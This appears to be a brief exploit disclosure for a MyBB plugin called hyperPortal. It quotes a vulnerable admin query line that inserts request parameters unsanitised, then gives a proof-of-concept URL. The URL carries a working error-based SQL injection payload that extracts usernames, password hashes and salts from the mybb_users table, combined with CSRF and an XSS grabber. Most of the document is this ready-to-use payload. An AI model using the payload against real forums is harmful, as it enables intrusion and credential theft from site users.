SQL Injection
=============
-------------[/admin/modules/config/admin-hyperPortal.php]-------------
//L.80
1$db->update_query('widgets',array("guests"=>$mybb->input['guests'],"header"=>$mybb->input['header'],"fixed"=>$mybb->input['fixed']), "widget_name='$codename'");
-------------[/admin/modules/config/admin-hyperPortal.php]-------------
Proof of concept
================
Error based (need csrf and xss grabber);
http://[site]/hyperportal.phpadmin/index.php?module=config-hyperportal&action=configure&guests=', header=(select 1 from(select count(*),concat((select concat(username, 0x3a, password, 0x3a, salt, 0x3a) from mybb_users limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
Groucho